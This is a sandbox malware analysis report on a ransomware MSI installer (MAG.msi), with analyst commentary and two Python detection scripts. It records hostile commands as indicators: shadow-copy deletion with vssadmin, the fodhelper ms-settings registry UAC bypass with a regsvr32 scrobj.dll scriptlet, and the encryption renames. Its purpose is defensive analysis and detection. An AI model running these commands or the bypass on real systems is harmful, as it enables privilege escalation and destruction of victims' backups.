Analysis
-
max time kernel: 292s
max time network: 300s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 23-05-2022 05:24
-
Static task: static1
Behavioral task: behavioral1 (Sample: MAG.msi, Resource: win7-20220414-en)
Behavioral task: behavioral2 (Sample: MAG.msi, Resource: win10v2004-20220414-en)
General
-
Target: MAG.msi
Size: 96KB
MD5: 957d0c81c985609c580565a0323a14cd
SHA1: d8d46413409a14a1ae407107016e28074c6824d5
SHA256: 9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
SHA512: 0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52
Malware Config
Signatures
-
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files (9 IoCs)
Ransomware generally changes the extension on encrypted files. Here every renamed file keeps its original name and gains the appended extension .meemybio; the acting process is MsiExec.exe (PID 748), the -Embedding custom-action host spawned by the installer service, not the installer itself.
Processes: MsiExec.exe
description | ioc | process
File renamed | C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio | MsiExec.exe
File opened for modification | C:\Users\Admin\Pictures\StepOpen.tiff | MsiExec.exe
File renamed | C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio | MsiExec.exe
-
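The heuristic behind this signature, written out as an added example (not code from the report or the sandbox): group "File renamed" events by the acting process and by the suffix that was appended to the original full name, and alert when a single process appends the same new extension to many files. An ordinary rename (name changed, extension kept) does not count. The input lines are constructed in the shape of the nine IoCs above plus one benign rename; the threshold of five files is an assumption for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed input in the shape of the report's IoC rows: the eight renames
# and one "opened for modification" event listed above, plus one benign
# rename (report.docx => report_final.docx) that must not count.
FILE_EVENTS = [
    r"File renamed C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio MsiExec.exe",
    r"File opened for modification C:\Users\Admin\Pictures\StepOpen.tiff MsiExec.exe",
    r"File renamed C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio MsiExec.exe",
    r"File renamed C:\Users\Admin\Documents\report.docx => C:\Users\Admin\Documents\report_final.docx WINWORD.EXE",
]

# "File renamed <old> => <new> <process>"; the process is the last token.
RENAME_RE = re.compile(r"^File renamed (?P<old>.+) => (?P<new>.+) (?P<proc>\S+)$")


def appended_suffix(old, new):
    """Suffix the rename added to the original full name (e.g. '.meemybio'),
    or None when the new name is not simply the old name plus a suffix."""
    if new.startswith(old) and len(new) > len(old):
        return new[len(old):]
    return None


def rename_profile(events):
    """Per process, how many files received each appended suffix."""
    profile = defaultdict(Counter)
    for line in events:
        m = RENAME_RE.match(line)
        if not m:
            continue  # not a rename (e.g. "File opened for modification")
        suffix = appended_suffix(m["old"], m["new"])
        if suffix and suffix.startswith("."):
            profile[m["proc"]][suffix] += 1
    return profile


def ransomware_suspects(events, min_files=5):
    """Processes that appended one new extension to at least min_files files.
    The threshold is an assumption for this example, not a report value."""
    suspects = {}
    for proc, counts in rename_profile(events).items():
        suffix, n = counts.most_common(1)[0]
        if n >= min_files:
            suspects[proc] = (suffix, n)
    return suspects


if __name__ == "__main__":
    for proc, (suffix, n) in ransomware_suspects(FILE_EVENTS).items():
        print(f"{proc}: appended {suffix!r} to {n} files")
```

Keying on the appended suffix rather than on the final extension is what separates encrypt-in-place ransomware from a user saving a file under a new name: the benign WINWORD.EXE rename above changes the stem, so it yields no suffix and never enters the profile.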
Loads dropped DLL (1 IoCs)
Processes: MsiExec.exe
pid | process
748 | MsiExec.exe
-
Adds Run key to start application (2 TTPs, 1 IoCs)
The key is created by msedge.exe, the browser the sample launched to open the ransom URL; only the key creation is recorded, no value written under it.
Processes: msedge.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
-
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive. Both processes here are the Windows Installer itself (the msiexec.exe /I client and the msiexec.exe /V service in the process tree), not the custom-action host that does the encryption, so on its own this is weak evidence.
Processes: msiexec.exe, msiexec.exe
description | ioc | process
File opened (read-only) | \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (every letter except C: and D:, each opened twice, 48 events in total) | msiexec.exe
-
Suspicious use of SetThreadContext (3 IoCs)
MsiExec.exe (PID 748) sets the thread context of three already-running system processes. Each of those three (2384 sihost.exe, 2396 svchost.exe, 2492 taskhostw.exe) then appears in the WriteProcessMemory list writing into a regsvr32.exe child and as the root of a regsvr32 / fodhelper / vssadmin chain in the process tree, which is consistent with code injection into those hosts.
Processes: MsiExec.exe
description | pid | process | target process
PID 748 set thread context of 2384 | 748 | MsiExec.exe | sihost.exe
PID 748 set thread context of 2396 | 748 | MsiExec.exe | svchost.exe
PID 748 set thread context of 2492 | 748 | MsiExec.exe | taskhostw.exe
-
Drops file in Program Files directory (2 IoCs)
Both paths are Microsoft Edge's own SetupMetrics files written by its setup.exe, a side effect of the browser launch rather than a payload drop.
Processes: setup.exe
description | ioc | process
File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b8d2acf9-a11f-4204-b537-d3e08c661f52.tmp | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523072615.pma | setup.exe
-
Drops file in Windows directory (9 IoCs)
These are the Windows Installer service's normal working files: the package is cached under C:\Windows\Installer (e57ba76.msi, e57ba78.msi), custom-action binaries are extracted to MSIxxxx.tmp files there, and the SourceHash key carries the package's product code {ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA}, which is a useful pivot for related samples.
Processes: msiexec.exe
description | ioc | process
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\e57ba76.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\e57ba76.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIBC6A.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC322.tmp | msiexec.exe
File created | C:\Windows\Installer\e57ba78.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) (3 TTPs, 64 IoCs)
SCSI information is often read in order to detect sandboxing environments. In this run, however, all 64 reads are attributed to svchost.exe and vssvc.exe (the Volume Shadow Copy service that the vssadmin.exe calls drive), not to the sample's own processes, so on its own this is not evidence that the sample fingerprints the sandbox.
Processes: svchost.exe, vssvc.exe
Key prefixes used in the rows below:
DISK = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000
CDROM = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000
description | ioc | process
Key opened | DISK\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | svchost.exe
Key opened | DISK\Device Parameters | vssvc.exe
Key opened | CDROM | svchost.exe
Key opened | CDROM\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | svchost.exe
Key opened | DISK\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | svchost.exe
Key opened | DISK\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
Key opened | CDROM\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
Key value queried | DISK\HardwareID | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
Key value queried | CDROM\CompatibleIDs | svchost.exe
Key opened | CDROM\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | svchost.exe
Key opened | DISK\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | DISK\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key value queried | CDROM\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | svchost.exe
Key opened | DISK\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | svchost.exe
Key opened | CDROM\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | svchost.exe
Key value queried | DISK\Mfg | svchost.exe
Key opened | CDROM\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key queried | DISK\Device Parameters | vssvc.exe
Key opened | CDROM\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | CDROM\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | svchost.exe
Key opened | DISK\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | svchost.exe
Key value queried | CDROM\FriendlyName | svchost.exe
Key opened | CDROM\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | svchost.exe
Key opened | DISK\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
Key opened | DISK\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | svchost.exe
Key opened | CDROM\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | svchost.exe
Key opened | DISK\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | DISK\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | svchost.exe
Key opened | DISK\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | svchost.exe
Key value queried | CDROM\Mfg | svchost.exe
Key opened | CDROM\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | svchost.exe
Key value queried | CDROM\ConfigFlags | svchost.exe
Key opened | CDROM\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | svchost.exe
Key opened | CDROM\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | svchost.exe
Key value queried | DISK\CompatibleIDs | svchost.exe
Key opened | DISK\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | svchost.exe
Key value queried | CDROM\Capabilities | svchost.exe
Key opened | CDROM\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | svchost.exe
Key value queried | DISK\Capabilities | svchost.exe
Key opened | CDROM\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | svchost.exe
Key value queried | DISK\DeviceDesc | svchost.exe
Key value queried | DISK\FriendlyName | svchost.exe
Key value queried | DISK\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | svchost.exe
Key value queried | CDROM\HardwareID | svchost.exe
Key opened | CDROM\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
Key opened | DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | svchost.exe
Key opened | CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | svchost.exe
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
All three reads come from msedge.exe, the browser launched to display the ransom URL, not from the sample's own code.
Processes: msedge.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
-
Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery. Six vssadmin.exe instances ran "Delete Shadows /all /quiet" (see the process tree): two beneath each of the three injected system processes, each launched by the regsvr32.exe that fodhelper.exe elevated.
Processes: vssadmin.exe (x6)
pid | process
800 | vssadmin.exe
2308 | vssadmin.exe
2464 | vssadmin.exe
3900 | vssadmin.exe
3736 | vssadmin.exe
2820 | vssadmin.exe
-
Modifies data under HKEY_USERS (1 IoCs)
Processes: svchost.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
-
Modifies registry class (18 IoCs)
The regsvr32.exe entries are the staging step of the fodhelper.exe UAC bypass (ATT&CK T1548.002): fodhelper.exe is an auto-elevating Microsoft binary that resolves the ms-settings: protocol handler through the current user's Classes hive, so a command placed in HKCU\Software\Classes\ms-settings\shell\open\command together with a DelegateExecute value runs at high integrity without a consent prompt. The staged command, regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb, loads a COM scriptlet through scrobj.dll without registering anything (T1218.010); the relative path resolves to C:\Users\Public from a System32 working directory. The process tree shows cmd /c "start fodhelper.exe" following each write, and the elevated regsvr32.exe then launching vssadmin.exe. The sihost.exe and msedge.exe entries are ordinary application state.
Processes: regsvr32.exe (x3), sihost.exe, msedge.exe
HKCU_CLASSES = \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes
description | ioc | process
Key created | HKCU_CLASSES\ms-settings\shell\open | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings\shell\open\command | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings\shell | regsvr32.exe
Set value (str) | HKCU_CLASSES\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings | regsvr32.exe
Set value (int) | HKCU_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | sihost.exe
Set value (str) | HKCU_CLASSES\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings\shell | regsvr32.exe
Set value (str) | HKCU_CLASSES\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Set value (str) | HKCU_CLASSES\ms-settings\shell\open\command\DelegateExecute | regsvr32.exe
Set value (int) | HKCU_CLASSES\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | sihost.exe
Key created | HKCU_CLASSES\ms-settings\shell\open | regsvr32.exe
Set value (str) | HKCU_CLASSES\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings\shell\open\command | regsvr32.exe
Set value (str) | HKCU_CLASSES\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings\shell\open\command | regsvr32.exe
Key created | HKCU_CLASSES\ms-settings | regsvr32.exe
-
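A detection for the staging writes in this list, added here as an example and not part of the report: parse each registry line into operation, key, value and process, and flag any write beneath the per-user ms-settings\shell\open\command key, rating a DelegateExecute value or a default command as high and a bare key creation as medium. The input lines are constructed in the report's own format from the IoCs above (three regsvr32.exe writes plus the msedge.exe and sihost.exe entries, which must not fire); the rule names and severities are assumptions for the example.

```python
import re

# SID of the sandbox user, exactly as it appears in the report's registry paths.
SID = "S-1-5-21-1081944012-3634099177-1681222835-1000"
HKCU_CLASSES = "\\REGISTRY\\USER\\" + SID + "_Classes"

# Constructed from the "Modifies registry class" IoCs above: the three regsvr32.exe
# writes that stage the bypass, plus the msedge.exe CLSID key and the sihost.exe
# WasEverActivated value, which are ordinary and must not fire.
REG_EVENTS = [
    "Key created " + HKCU_CLASSES + r"\ms-settings\shell\open\command regsvr32.exe",
    "Set value (str) " + HKCU_CLASSES + r'\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe',
    "Set value (str) " + HKCU_CLASSES + r"\ms-settings\shell\open\command\DelegateExecute regsvr32.exe",
    r"Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe",
    "Set value (int) " + HKCU_CLASSES + r'\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe',
]

# "<op> <key>[ = "<value>"] <process>": the process is always the last token,
# the key may contain spaces (e.g. "Local Settings").
REG_LINE = re.compile(r"^(Key created|Set value \(\w+\)) (.*) (\S+)$")

# Any write below HKCU\Software\Classes\ms-settings\shell\open\command is the
# staging step of the fodhelper.exe / computerdefaults.exe UAC bypass
# (ATT&CK T1548.002). The report writes the hive as \REGISTRY\USER\<SID>_Classes.
UAC_STAGING = re.compile(
    r"\\REGISTRY\\USER\\[^\\]+_Classes\\ms-settings\\shell\\open\\command(\\|$)", re.I)


def parse_reg_event(line):
    """Split a report-style line into (operation, key path, value or None, process)."""
    m = REG_LINE.match(line)
    if not m:
        return None
    op, rest, proc = m.groups()
    value = None
    if ' = "' in rest:
        rest, value = rest.split(' = "', 1)
        value = value.rstrip('"')
    return op, rest, value, proc


def classify(line):
    """Finding dict for a UAC-bypass staging write, else None."""
    parsed = parse_reg_event(line)
    if parsed is None:
        return None
    op, key, value, proc = parsed
    if not UAC_STAGING.search(key):
        return None
    leaf = key.rstrip("\\").rsplit("\\", 1)[-1].lower()
    if leaf == "delegateexecute":
        rule, severity = "uac_bypass_delegateexecute", "high"
    elif value is not None:
        rule, severity = "uac_bypass_command", "high"   # default value = command fodhelper will run
    else:
        rule, severity = "uac_bypass_key_created", "medium"
    return {"rule": rule, "severity": severity, "process": proc, "key": key, "value": value}


def triage(events):
    return [f for f in map(classify, events) if f is not None]


def staged_command(events):
    """The command the bypass will run at high integrity, if one was written."""
    for f in triage(events):
        if f["rule"] == "uac_bypass_command":
            return f["value"]
    return None


if __name__ == "__main__":
    for f in triage(REG_EVENTS):
        print(f["severity"], f["rule"], f["process"], f["key"])
    print("staged:", staged_command(REG_EVENTS))
```

The key path alone is enough to raise the alert; the value is kept because it is the next pivot: here it names the second-stage scriptlet under C:\Users\Public, which is the file to pull from the host.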
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes: msiexec.exe, MsiExec.exe, msedge.exe, msedge.exe, identity_helper.exe, msedge.exe
pid | process
2344 | msiexec.exe (x2)
748 | MsiExec.exe (x2)
4400 | msedge.exe (x2)
4984 | msedge.exe (x2)
4304 | identity_helper.exe (x2)
264 | msedge.exe (x4)
-
Suspicious behavior: MapViewOfSection (3 IoCs)
Processes: MsiExec.exe
pid | process
748 | MsiExec.exe (x3)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
Processes: msedge.exe
pid | process
4984 | msedge.exe (x5)
-
Suspicious use of AdjustPrivilegeToken (64 IoCs)
PID 5104 is the msiexec.exe /I client and PID 2344 the msiexec.exe /V service (see the process tree); the privileges below are the ones the Windows Installer enables for itself, so this signature reflects the installer rather than the sample's own code.
Processes: msiexec.exe, msiexec.exe, vssvc.exe
description | pid | process
Token: SeShutdownPrivilege | 5104 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 5104 | msiexec.exe
Token: SeSecurityPrivilege | 2344 | msiexec.exe
Token: SeCreateTokenPrivilege | 5104 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 5104 | msiexec.exe
Token: SeLockMemoryPrivilege | 5104 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 5104 | msiexec.exe
Token: SeMachineAccountPrivilege | 5104 | msiexec.exe
Token: SeTcbPrivilege | 5104 | msiexec.exe
Token: SeSecurityPrivilege | 5104 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 5104 | msiexec.exe
Token: SeLoadDriverPrivilege | 5104 | msiexec.exe
Token: SeSystemProfilePrivilege | 5104 | msiexec.exe
Token: SeSystemtimePrivilege | 5104 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 5104 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 5104 | msiexec.exe
Token: SeCreatePagefilePrivilege | 5104 | msiexec.exe
Token: SeCreatePermanentPrivilege | 5104 | msiexec.exe
Token: SeBackupPrivilege | 5104 | msiexec.exe
Token: SeRestorePrivilege | 5104 | msiexec.exe
Token: SeShutdownPrivilege | 5104 | msiexec.exe
Token: SeDebugPrivilege | 5104 | msiexec.exe
Token: SeAuditPrivilege | 5104 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 5104 | msiexec.exe
Token: SeChangeNotifyPrivilege | 5104 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 5104 | msiexec.exe
Token: SeUndockPrivilege | 5104 | msiexec.exe
Token: SeSyncAgentPrivilege | 5104 | msiexec.exe
Token: SeEnableDelegationPrivilege | 5104 | msiexec.exe
Token: SeManageVolumePrivilege | 5104 | msiexec.exe
Token: SeImpersonatePrivilege | 5104 | msiexec.exe
Token: SeCreateGlobalPrivilege | 5104 | msiexec.exe
Token: SeBackupPrivilege | 5088 | vssvc.exe
Token: SeRestorePrivilege | 5088 | vssvc.exe
Token: SeAuditPrivilege | 5088 | vssvc.exe
Token: SeBackupPrivilege | 2344 | msiexec.exe
Token: SeRestorePrivilege | 2344 | msiexec.exe (x15, alternating with SeTakeOwnershipPrivilege from the second occurrence on)
Token: SeTakeOwnershipPrivilege | 2344 | msiexec.exe (x13)
-
Suspicious use of FindShellTrayWindow (4 IoCs)
Processes: msiexec.exe, msedge.exe
pid | process
5104 | msiexec.exe (x2)
4984 | msedge.exe (x2)
-
Suspicious use of WriteProcessMemory (64 IoCs)
Every writer/target pair below matches a parent/child edge in the process tree, so these are largely the writes that accompany process creation rather than cross-process injection; the injection itself is the SetThreadContext entry above. The pairs worth noting are the three system processes (2492 taskhostw.exe, 2384 sihost.exe, 2396 svchost.exe) each writing into a regsvr32.exe child, which ties the injected hosts to the scriptlet chains.
Processes: msiexec.exe, taskhostw.exe, sihost.exe, svchost.exe, MsiExec.exe, cmd.exe, msedge.exe
description | pid | process | target process
PID 2344 wrote to memory of 3300 | 2344 | msiexec.exe | srtasks.exe (x2)
PID 2344 wrote to memory of 748 | 2344 | msiexec.exe | MsiExec.exe (x2)
PID 2492 wrote to memory of 2336 | 2492 | taskhostw.exe | regsvr32.exe (x2)
PID 2384 wrote to memory of 3052 | 2384 | sihost.exe | regsvr32.exe (x2)
PID 2396 wrote to memory of 1876 | 2396 | svchost.exe | regsvr32.exe (x2)
PID 748 wrote to memory of 1404 | 748 | MsiExec.exe | cmd.exe (x2)
PID 1404 wrote to memory of 4984 | 1404 | cmd.exe | msedge.exe (x2)
PID 4984 wrote to memory of 4816 | 4984 | msedge.exe | msedge.exe (x2)
PID 4984 wrote to memory of 1872 | 4984 | msedge.exe | msedge.exe (x40)
PID 4984 wrote to memory of 4400 | 4984 | msedge.exe | msedge.exe (x2)
PID 4984 wrote to memory of 1528 | 4984 | msedge.exe | msedge.exe (x6)
Processes
-
Each row is depth⤵ image path | command line; the signatures raised by that process are listed beneath it. Children are indented under their parent.
1⤵ C:\Windows\system32\sihost.exe | sihost.exe
   - Modifies registry class
   - Suspicious use of WriteProcessMemory
  2⤵ C:\Windows\system32\regsvr32.exe | regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
     - Modifies registry class
  2⤵ C:\Windows\system32\cmd.exe | cmd /c "start fodhelper.exe"
    3⤵ C:\Windows\system32\fodhelper.exe | fodhelper.exe
      4⤵ C:\Windows\system32\regsvr32.exe | "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        5⤵ C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
           - Interacts with shadow copies
  2⤵ C:\Windows\system32\cmd.exe | cmd /c "start fodhelper.exe"
    3⤵ C:\Windows\system32\fodhelper.exe | fodhelper.exe
      4⤵ C:\Windows\system32\regsvr32.exe | "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        5⤵ C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
           - Interacts with shadow copies
1⤵ C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
   - Suspicious use of WriteProcessMemory
  2⤵ C:\Windows\system32\regsvr32.exe | regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
     - Modifies registry class
  2⤵ C:\Windows\system32\cmd.exe | cmd /c "start fodhelper.exe"
    3⤵ C:\Windows\system32\fodhelper.exe | fodhelper.exe
      4⤵ C:\Windows\system32\regsvr32.exe | "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        5⤵ C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
           - Interacts with shadow copies
  2⤵ C:\Windows\system32\cmd.exe | cmd /c "start fodhelper.exe"
    3⤵ C:\Windows\system32\fodhelper.exe | fodhelper.exe
      4⤵ C:\Windows\system32\regsvr32.exe | "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
        5⤵ C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
           - Interacts with shadow copies
